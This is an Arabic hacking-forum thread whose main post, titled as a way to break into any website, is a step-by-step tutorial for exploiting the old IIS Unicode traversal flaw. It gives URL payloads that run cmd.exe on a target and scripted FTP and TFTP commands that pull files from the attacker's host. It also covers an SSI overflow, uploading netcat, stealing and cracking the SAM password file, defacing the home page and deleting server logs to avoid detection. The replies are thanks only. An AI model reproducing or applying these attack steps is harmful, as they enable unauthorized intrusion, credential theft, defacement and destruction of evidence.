شركة استضافة . مركز تحميل . الاسلام . مكتبة الفيديو . تحميل من يوتيب . المجموعة البريدية . خدمات للمواقع . اتصل بنا

حياك الله اخي الزائر هذة الرسالة تظهر للغير مسجيلن يشرفنا تسجيلك في منتديات القرصان للتسجيل اضغط هنا


العودة   منتديات القرصان > المواقع والسرفرات > قرصنة المواقع و السيرفرات

قرصنة المواقع و السيرفرات شرح الاختراق و اخر الثغرات

Tags H1 to H6

منتديات القرصان

> طريقه لاختراق اى موقع حتها لو كان مرفوع على مليون سيرفر

> طريقه لاختراق اى موقع حتها لو كان مرفوع على مليون سيرفر

إضافة رد
آلقائمة الرئيسية
التسجيل
البحث
مشاركات اليوم
التقويم
التعليمات
المتواجدون حالياً
مشاهدة ملفي الشخصي

مواقع صديقة

روابط مفيدة
طلب كلمة المرور
كود التفعيل
تفعيل العضوية
مراسلة الإدارة

آخبار المنتدى
- $vbphrase[sclt_by] $vietvbb_sclt[postusername]

محركات البحث

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 12-14-2009, 04:29 PM

قرصان فعال

 
تاريخ التسجيل: Nov 2009
المشاركات: 55
ampro will become famous soon enough
Arrow > طريقه لاختراق اى موقع حتها لو كان مرفوع على مليون سيرفر

السلام عليكم

يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-

- تعريف باليونيكود .

- تاريخ ظهور هذه الثغرة .

- كيفية ايجاد هذه الثغرات .

- كيف يتم استغلال ثغرات اليونكود .

- الاوامر المستخدمة بواسطة ملف CMD .

- طريقة تطبيق هذه الثغرات .

- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .

- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .

- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .

- كيفية عمل اكاونت للدخول بواسطة الـFTP .

- طريقة كشف باسورد الادمينستريتور .

- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .

- مسح ملفات اللوق حتى لا يتم التعرف عليك .








- تعريف باليونيكود .

اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .





- تاريخ ظهور هذه الثغرة .

لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .





- كيفية ايجاد هذه الثغرات .

يتم ايجاد هذه الثغرات بطريقتين :-

1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .

2- بواسطة تطبيق الثغرة على الموقع مباشرة .





- كيف يتم استغلال ثغرات اليونكود .

عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .





- الاوامر المستخدمة بواسطة ملف CMD .

الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-امر انشاء دليل جديد:





http://www.xxxx.com/msadc/..%c0%af....xe?/c+md+c:\hEx





امر الغاء دليل: http://www.xxxx.com/msadc/..%c0%af....xe?/c+rd+c:\hEx


للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات





الامر المستخدم للنسخ:


http://www.xxxx.com/msadc/..%c0%af....ript s\hEx.exe





الامر المستخدم للنقل:


http://www.xxxx.com/msadc/..%c0%af.... s\hEx.exe+c:\





الامر المستخدم للحذف: http://www.xxxx.com/msadc/..%c0%af....+del+c:\hEx.mdb





الامر المستخدم لتغيير مسمى الملفات: http://www.xxxx.com/msadc/..%c0%af....dex.htm+hEx.htm





الامر المستخدم لرؤية محتويات الملف: http://www.xxxx.com/msadc/..%c0%af....type+c:\hEx.txt





الامر المستخدم للكتابة داخل أي ملف:


http://www.xxxx.com/msadc/..%c0%af....c:\hEx.txt





الامر المستخدم لعملية سحب أي ملف:


عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:


http://www.xxxx.com/msadc/hEx.mdb






- طريقة تطبيق هذه الثغرات .

تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-

http://www.xxxx.com/scripts/..%c1%1....exe?/c+dir+c:\

http://www.xxxx.com/scripts/..%c0%9....exe?/c+dir+c:\

http://www.xxxx.com/scripts/..%c0%a....exe?/c+dir+c:\

http://www.xxxx.com/scripts/..%c0%q....exe?/c+dir+c:\

http://www.xxxx.com/scripts/..%c1%8....exe?/c+dir+c:\

http://www.xxxx.com/scripts/..%c1%9....exe?/c+dir+c:\

http://www.xxxx.com/scripts/..%c1%p..&.../cmd.exe?/c+dir +c:\

وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-

Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin





- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .

في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-

http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\



فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-

http://www.xxxx.com/msadc/..%c0%af....ripts\w3svc.exe



بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-

http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\

الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل

inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-

http://www.xxxx.com/scripts/w3svc.exe?/c+e...mail.com+>+c :\inetpub\wwwroot\index.htm





- طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .

الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-

http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe

الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-

http://www.xxxx.com/msadc/..%c0%af....1.exe?c+dir+c:\





- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .

تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-

1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-

http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe

2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-

o اولا انشاء صفحة باسم test.shtml

o تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml

o كتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .

o الان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml

o الان سوف تظهر لك الصفحة .

o الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .

o اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .

3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .

4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .

5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .





- كيفية عمل اكاونت للدخول بواسطة الـFTP .

1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة

/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exe

2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .

/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl

3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll

/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl

4- الان مطلوب ادراج البريد smsm_smsm_20100@hotmail.com الى نفس الملف الذي قمنا بانشاءه mspft.pll

/shell.exe?/c+echo+jnx-@Hotmail.Com+>>+c:\winnt\mspft.ppl

5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll

/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl

6- الان تكرار لحاجة الاعداد

/shell.exe?/c+echo+jnx-@Hotmail.Com+>>+c:\winnt\mspft.ppl

7- يتم هنا ادراج الموقع الحالي للملفات

/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.pp l

8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق

/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl

9- هنا نفس السابق ولكن باضافة Quit

/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl

10- الان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl" وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-

- Open FTP.host.com

- Anonymous

- jnx-@Hotmail.Com

- User Anonymous

- jnx-@Hotmail.Com

- Get index.html

- Quit



/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"






- طريقة كشف باسورد الادمينستريتور .

نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-

- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack كما هو موضح بالشكل التالي




اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Lsa\SYSTEM32\PASSFILT.DLL



- اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-

http://www.xxxx.com/default.asp+.htr



عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .





- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .

1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\

2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .






/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. ht m

وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر tftp.exe

وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
"-i"

رقم الايبي الخاص بك
1.1.1.1

وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
GET

اسم الملف بجهازك
index.htm

اسم الدليل في السيرفر
\inetpub\wwwroot\
اسم الملف على السيرفر
index.htm


مسح ملفات اللوق حتى لا يتم التعرف عليك .

وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-

/c+del+c:/winnt/system32/logfiles/*.log


انتهى الدرس
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس

حمل اي مقطع فيديوا من 
اليوتيب بدون برامج

اقوى استضافة عربية

  #2  
قديم 12-15-2009, 12:06 PM

قرصان جديد

 
تاريخ التسجيل: Dec 2009
المشاركات: 1
ناصرالفهد will become famous soon enough
افتراضي

اللة يعطيك العافية
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #3  
قديم 12-16-2009, 02:22 AM

قرصان متحمس

 
تاريخ التسجيل: Nov 2009
المشاركات: 17
kamimel will become famous soon enough
افتراضي

شكرا لك اخي العزيز على المجهود المتميز
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #4  
قديم 12-20-2009, 08:51 PM

قرصان متحمس

 
تاريخ التسجيل: Dec 2009
المشاركات: 12
مفارق will become famous soon enough
افتراضي

الف شكرررررررررر لك
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #5  
قديم 12-27-2009, 12:04 PM

قرصان فعال

 
تاريخ التسجيل: Dec 2009
المشاركات: 56
القرش المجنون will become famous soon enough
افتراضي

مشكور على الموضوع
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #6  
قديم 12-27-2009, 12:04 PM

قرصان فعال

 
تاريخ التسجيل: Dec 2009
المشاركات: 56
القرش المجنون will become famous soon enough
افتراضي

مشكور
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #7  
قديم 12-27-2009, 12:05 PM

قرصان فعال

 
تاريخ التسجيل: Dec 2009
المشاركات: 56
القرش المجنون will become famous soon enough
افتراضي

موضوع رائع ... الله يعطيك العافيه
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #8  
قديم 01-06-2010, 03:07 PM
الصورة الرمزية emproro
مشرف
 
تاريخ التسجيل: Mar 2009
الدولة: بيت القراصنة
المشاركات: 482
emproro will become famous soon enough
افتراضي

حياكم الله
__________________
EMPRORO

نعيب الزمان والعيب فينا وما للزامن عيب سوانا

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #9  
قديم 01-10-2010, 01:50 AM

قرصان جديد

 
تاريخ التسجيل: Jan 2010
المشاركات: 6
3ssa te7a is on a distinguished road
افتراضي

شكــــــــــــــــــرا لك
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
إضافة رد



يتصفح الموضوع حالياً : 1 (0 عضو و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة



جميع الأوقات بتوقيت GMT. الساعة الآن 09:49 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.3.2

تعريب » القرصان - خدمات الويب

:: الحماية برعاية (القرصان - خدمات الويب ) ::


Secruity By Krsan.com
جميع الحقوق محفوظة القرصان 2006-2010